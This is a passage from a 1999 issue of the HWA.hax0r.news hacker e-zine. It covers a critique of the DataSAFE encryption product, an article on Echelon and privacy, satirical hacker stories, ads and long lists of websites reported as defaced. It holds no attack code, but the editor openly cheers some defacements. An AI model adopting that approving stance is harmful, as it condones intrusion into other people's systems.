steps over this issue, merely saying "you send [the key] separately".) The product offers no identity verification for the author or originator of the file being transfered. In addition, the .exe generated is a potential carrier of virii, and only works on Microsoft systems. (Though a Java version is promised.) The product white paper (http://data-encryption.com/datasheets/ds_white.html) makes this absurd statement regarding public key cryptography (PKC): "Public key encryption was discarded because it is too difficult to establish key exchange with third party organizations running a variety of computer hardware, mail systems and security programs. For example, a typical law office needs to be able to send secure documents to a wide range of client organizations, each having their own unique combination of computers, mail and security systems." PGP, and its free clone released under the GPL, GnuPG, are perfect examples of secure PKC that are easily implemented across a variety of computer hardware, mail systems and security systems. There is an established network of public key servers that is widely used by nearly every combination of software and hardware across the entire Internet. (http://http://pgp.ai.mit.edu/ is one such server.) DataSAFE, however, is not available except on systems running the correct versions of Microsoft operating systems. The closing statement on the product white paper offers this explanation for the product's design: "It should be recognized that BLOWFISH is just one of many excellent encryption algorithms. In real life situations the security provided depends much more on the user's ability to make use of the software than the mathematical underpinnings of the encryption engine. The NOVaSTOR DataSAFE strives to be so simple to use that people are willing and able to secure their files." Granted, the best encryption software in the world is useless if people won't use it. But, in my opinion it is far more dangerous to lure people into a false sense of security. Products like DataSAFE could possibly encourage someone to reveal sensitive material on electronic correspondence that he would otherwise have been reluctant to communicate. It is my recommendation that DataSAFE not be used by anyone requiring anything more than casual security. The freely available GnuPG (http://www.gnupg.org), and the inexpensive PGP (www.pgp.com) offer the best system for secure email communication available, and should be used by anyone who is concerned about privacy. Products like DataSAFE should be set aside, along with the secret decoder ring from the breakfast cereal box. L. Sassaman System Administrator | "What's true in our minds is true, Technology Consultant | whether some people know it or not." icq.. 10735603 | pgp.. finger://ns.quickie.net/rabbi | --Robin Williams -----BEGIN PGP SIGNATURE----- Version: GnuPG v0.9.7 (GNU/Linux) Comment: OpenPGP Encrypted Email Preferred. iD8DBQE3U/MyPYrxsgmsCmoRAthbAJsGLzLS8wCqjnwSLgkZY6lEJN6kUQCeJhwC H5e+Iquwq/c1GUq6ndZzdPY= =BN59 -----END PGP SIGNATURE----- -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 126.0 [ISN] Technology a threat to right of privacy Silicon Valley ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Putrefied Cow Technology a threat to right of privacy Silicon Valley (Irish Times; 06/04/99) Last week, the US Congress requested that its intelligence services provide a detailed report about a global electronic eavesdropping system know as Echelon. They refused. Now congress is moving to make its request law. Echelon is just one of the emerging uses of technology that is eroding a basic human right, privacy. The system indiscriminately monitors satellite and Internet communications traffic using keyword searches in the case of e-mail, and scanning for certain telephone numbers in the case of mobile phones. The report was requested by Congress's House Committee on Intelligence and specifically asked that National Security Agency and the Central Intelligence Agency provide an account as to what legal standard they use to monitor US citizens. Another system, currently in the pipeline is EU's Enfopol, a specification that will provide European law enforcement officials with an electronic back door into the computer systems of Internet Service Providers and mobile telecommunications companies. Furthermore, later this year, the EU plans to introduce new encryption (a technology that scrambles data so that it cannot be read by eavesdroppers) legislation, which may affect people's right to exchange messages that cannot be read by law enforcement. Indeed, Internet and electronic privacy will be one of the biggest issues affecting citizens in the next century. Unfortunately law makers in Ireland, Europe and the US are staggeringly e naive about the effects these new laws, systems and so-called specifications will have on their future. The problem is one of ignorance. Law makers often don't understand technology and don't look far enough into the future to see how Internet and wireless communications will touch virtually every aspect of our lives in the not too distant future. But why the concern? Police and intelligence services are only trying to catch terrorist, criminals and child pornographers. True, if they are to catch these people they need to be able to track their movements, ensure that they are not shifting large amounts of money into offshore bank accounts and nip their next deadly or grossly illegal plans in the bud. Surely, you couldn't object to that? Unless, of course, you would object to passing a law that would enable police go through your credit-card receipts without a court order, tap your telephone at will and make a list of every place you visited, and every person you talked to without proper judicial control. Because that is what these systems allow. Increasingly people are buying goods and services on the Internet. This not only includes a novel from say, Amazon.com, but banking, share trading and even insurance services. Back-door access to mobile telephone records will not only provide access to conversations but pinpoint the location of the mobile phone and therefore its user. Furthermore, governments mistakenly believe that their judicial system will protect their citizens from abuses of these new methods of data collection and surveillance. However perhaps it's not just the local police force that should concern us, but the police force and intelligence agencies of foreign governments. Take the Echelon system, for example, it was established under the UKUSA agreement by the US's National Security Agency, and Britain's General Communications Headquarters to monitor the communications of the eastern bloc countries. While Echelon was designed as a system to monitor spies, according to a recent report prepared for the European Parliament's Scientific and Technology Options Assessment Panel there is evidence that member-countries also use the Echelon system for industrial espionage. The report states that British intelligence routinely collects information such as "company plans, telexes, faxes, and transcribed phone calls," and that the **NSA** provides weekly reports to the US department of commerce. The report recommends that Europe adopts strong encryption technology rather than restrict it and points out that it is the larger nations that have invested in spying activities, leaving smaller nations vulnerable. While few could object to these systems to apprehend criminals there needs to be awareness of exactly what powers they give governments and law enforcement. There also needs to be a way to ensure that they are being used correctly. It has taken centuries to gain the right to privacy, surely we should not throw it away so readily. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- T E R M U M L H U O R I L -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- Rumours: ~~~~~~~ Cartoon Hackers?? ~~~~~~~~~~~~~~~~~~ New IRC Network Contributed by siko Monday - June 21, 1999. 06:27PM UTC From www.innerpulse.com Do you ever experience harsh channel takeovers? Get nuked all day long? Get ridiculous spam directed your way? Hindered by immature skript kids? Want more of the same? Come to Slacknet! You can point your IRC client towards irc.slacknet.org, or irc.callcenterstech.net (server run by siko). Join #slacknet when you connect for all questions, concerns, and propositions. Slacknet IRC http://www.slacknet.org June 22nd 1999 From HNN http://www.hackernews.com/ contributed by delchi WB Scraps 'Real Hackers' Cartoon Rumor has it that Warner Brothers and Mattel have scrapped an idea for a new Saturday morning cartoon with a tie in toy line called "Real Hackers". The defunct storyline was to portray a group of real life hackers in cartoon form, reformed and fighting for good. Amongst the hackers to be represented were 'phiber optik', 'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld pond' as cyber warriors as they fought criminals bent on destroying the internet. It is unknown why Warner Brothers and Mattel scrapped this idea or if it even existed in the first place but in this hot pre Christmas marketplace, one can only wonder how long it will be before this ground breaking idea starts making money for somebody. Kasparov CheckMated? ~~~~~~~~~~~~~~~~~~~~ June 23nd 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Kasparov CheckMated? A source close to the BBC has told us that they think the World vs. Kasparov Chess match had been compromised yesterday by cyber intruders. Evidently the "World" playing against Kasparov had numerous Kings on the board at once. HNN has received no confiormation of this report. If anyone knows what really went on we would like to hear it. AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. www.innerpulse.com is back. heres a couple of ditties from them; Local Hacker Lays Smack Down on Inferior Hacker Contributed by siko Wednesday - June 23, 1999. 04:48PM UTC The chilling tale of hacker on hacker violence unfolded in the small IRC channel #hackphreak on Undernet this afternoon as a hacker calling himself 'clocker' explained the events. "It all started when this kid who can't possibly have more of an IQ than 80 started telling me about how he was a hacker. I had to smack him in the face. He said Linux was an ISP like AOL." The drama entailed many reactions. Some were in fear for their own safety from this "Hacker Enforcer". One hacker was later accused by clocker of "running windows". The hacker, clocker, was not available for comment. His mother made him clean his room. Hacker's Continue to Retaliate Contributed by siko Tuesday - June 22, 1999. 03:42AM UTC Two new groups have stood up in the battle against the extreme injustice of the FBI raiding several computer hackers that admitted to committing high crimes. Early this morning, minix.closet.jpl.nasa.gov was cracked by a hacker exploiting an unknown hole in the qpopper pop3 daemon. Version 2.43b4 of the mail server was thought to be secure. m0nk3yz 4 L1f3 left the following message on the cracked server: We are not jsut kids here doing this attakc thign. Their is no reasen for thinking we are young and not dangarous. We will keap hitting every .gov on the NET until the FBI comes crying on they're nees. Fear us. The second group, Niggaz With Attitude AND Computahz, completed a large portscan of www.fbi.gov. "I think they left their firewall port open, so we plan on netbussing the router so we can gain access to the lan and audit the internal security removing the firewall and changing the index.html.". explained uberklown. "By simply bypassing their network sockets we can go over to commands, drop down to nuke.. and hope from there on out." Innerpulse caught up with Albert Renford, director of Network Security at the FBI. INNERPULSE So when did you first realize you were going to get attacked by skilled crackers from across the globe? AL RENFORD Well we first detected a lot of connection attempts to our telnet port. I learned about password security at a trade show I attended in LA and had recently changed my root password from 'sex' to something more difficult. After the rash of failed logins, we began to notice a fluxuation in the amount of connections to port 139 we were getting. Something about oob or something. Weird. INN So what would you rate this threat on a scale of 1-10? AR Obviously its a 10. We are dealing with professional system crackers, cracking into servers with loads of sensitive data on them. You can't find exploits anywhere! IPP Have you ever visited rootshell.com? AR ? Attrition http://www.attrition.org/ Hacker News Network http://www.hackernews.com Song sung to the tune of "I'm the very model of a modern major general" from: http://www.harley.com/harley-quotes/unix-sysadmin.html by Harley Hahn Unix Sysadmin: I am the very model of a modern Unix Sysadmin, I've information relevant to programs in slash usr bin, I know the tricks of emacs and the vi bugs historical, From a to ZZ upper case, in order categorical; I'm very well acquainted too with matters of the interface, I understand commands of pine, and how they hurt the human race. About the pico editor I'm teeming with a lot o' bosh – With many cheerful facts of how it's dumber than a Macintosh. Everyone: With many cheerful facts of how it's dumber than a Macintosh. Unix Sysadmin: I'm very good at showing users how to pick the best of tools, I know I should avoid the nerds who hang out in the vestibules; In short, in matters relevant to programs in slash usr bin, I am the very model of a modern Unix Sysadmin. Everyone: In short, in matters relevant to programs in slash usr bin, He is the very model of a modern Unix Sysadmin. -=- @HWA SITE.1 @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... From HNN rumours section http://www.hackernews.com/ see the archives section on HNN or attrition.org for copies of many of these sites in their defaced form. http://www.attrition.org/ contributed by Anonymous Cracked Yet another busy weekend. The following sites have been reported to HNN as being cracked. http://www.chatuk.co.uk http://maif.gov http://www.freakstudios.com http://cenwo.nwo.usace.army.mil http://www.qplanet.com http://www.qplanet.net http://www.gccnj.edu http://www.panthersfootball.com http://www.atlantabravesbaseball.com http://rsd.gsfc.nasa.gov http://www.bbutx.com http://fusion.library.mssm.edu http://www.depaul.edu http://www.jinxcorp.com http://www.fweebsd.org http://www.landersoil.com http://www.naturalbornassholes.com http://www.rug.ac.be http://sun.vdp.fr June 8th contributed by Anonymous Cracked http://www.zms.or.jp http://nt.oneworld.org http://icg.clarkson.edu June 9th contributed by Anonymous Cracked The following sites have been reported as being cracked. http://kln.gov.my http://www.landfield.com http://www.420.net http://www.me.fau.edu http://www.zms.or.jp http://nt.oneworld.org http://icg.clarkson.edu June 10th contributed by Anonymous Cracked The following sites have been reported as cracked. http://www.joshcomm.com http://www.usd.edu http://www.ioc.state.il.us http://www.alloweb.com http://www.coollinux.com June 11th contributed by Anonymous Cracked Things seem to have slowed down a little recently. HNN has only received reports that three web sites have been cracked. http://programmingjunkies.com/ http://sol.marc.usda.gov http://index.ecu.edu June 14th contributed by Anonymous Cracked The following sites where reported as cracked over the weekend. http://www.garufa.com http://www.ancort.ru http://www.cdiunesco.org.ar http://www.cenidet.edu.mx http://www.galvash.com.mx http://www.naboodesigns.cx http://www.foxintl.com http://www.bbay.com http://mail.edomex.gob.mx http://www.matrix.msu.edu http://index.ecu.edu June 15th contributed by Anonymous Cracked X-PLOIT TEAM has returned with reported cracks of Mexican Government web sites as they continue to fight against corrupt government, and for freedom of speech. http://www.edomorelos.gob.mx June 16th contributed by Anonymous Cracked Things have seemed to be a little slow lately. Maybe because it is summertime. With the new IIS hole things will probably pick up. These are the sites that have been reported as cracked. http://www.skinheads.com http://www.softlink.cz http://rs-nt-1.une.edu.au http://virtual.lead.org http://www.shoot-n-iron.com http://www.zophar.com June 17th contributed by Anonymous Cracked The following sites have been reported as cracked. http://data3.gmu.edu http://www.highplaces.org http://ellzeymarine.com http://multilinkcom.com http://orion.web-hosting.com http://www.exo2060.com http://www.justmark.com June 18th contributed by Anonymous Cracked http://www.flavoredthunder.com http://nc-101.hypermart.net http://www.hansatreuhand.de http://www.aj.com http://www.wabba.com June21st Cracked It looks like it has been a busy weekend for some. The following sites have been reported as cracked. (Note: There are two .mil domains in this list.) http://www.metro.seoul.kr http://pindar.ilt.columbia.edu http://www.fpac.fsu.edu http://www.gis.dk http://cob-distance02.colorado.edu http://shadowflax.cs.byu.edu http://www.castnetcom.com http://www.ies.ncsu.edu http://www.ruckstuhlgaragen.ch http://www.bpfa.com http://www.catalogcafe.com http://www.des.uwm.edu http://insite.net http://www.wabba.com http://www.bisnet.scsu.edu http://rs-nt-1.une.edu.au http://www.cityhackers.com http://www.hsd401.org http://fjsrc.urban.org http://www.communityofcaring.org http://lhi5.ifsm.umbc.edu http://uhec.udmercy.edu http://www.earthforce.org http://www.e-lawyers.net http://www.dancinghands.com http://www.coolkids.com http://www.aggerholm.com http://www.canada.org.mx http://www.mightymedia.com http://www.wib.lehigh.edu http://www.nswcl.navy.mil http://www.ntsc.navy.mil http://armstrong.scu.edu http://uhec.udmercy.edu http://www.ameralert.com http://www.autosportmag.com http://www.futuristicsound.com http://www.lyndalong.com http://www.netpay321.net http://www.ohioagent.com http://www.showcase-newhomes.com http:/www.eurobasket99.com http:/plan.arch.usyd.edu.au http:/bluesroom.co.za http:/seekerz.co.za http:/www.good-design.com http:/www.xpandcorp.com June 22nd contributed by Anonymous Cracked The following sites have been reported as cracked. http://lhi5.umbc.edu http://www.reg.niu.edu http://mnyouth.org http://www.dynamic-21.com http://www.ergointerfaces.com http://www.salcotoys.com http://www.teachertalk.com http://www.usd.edu June 23rd Cracked The following sites have been reported to us as compromised. http://hpws3.ihep.ac.cn http://www.atljf.org http://www.121trade.com http://www.bizzcity.com http://www.internetgate.com http://www.nflgameday.com http://www.orgplanning.com http://www.thanks-cgi.com http://observer.gsfc.nasa.gov http://www.ipub.com June 24th contributed by Anonymous Cracked The following sites have been reported as cracked. http://www.5aday.gov http://www.kukje.co.kr http://www.drysound.com http://www.internet-club.com http://www.justmark.com http://www.thanks-cgi.com June 25th contributed by Anonymous Cracked The following sites have been reported as Cracked: http://www.cpr-training.com http://www.magnaflow.com http://www.library.anl.gov http://www.industrialbikes.com http://www.monmouth.army.mil http://www.sterzing.com http://www.unicef.org.ar http://cis.georgefox.edu http://arcvirtualcampus.org http://www.musclecars.org http://www.habaco.com http://www.iphase.com http://www.arkon.net http://www.art-by-kaki.com http://www.dcclan.com http://www.heckerdesign.com http://www.nlac.gov.tw http://www.pixeled.com http://www.twilightsoftware.com http://www.cpac.org http://www.forpc.com.au http://www.orgplanning.com http://www.nethelpnow.com http://www.appliedcls.com http://www.craigcph.com http://www.damascusbakery.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.genocide2600.com/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] +++ ATH0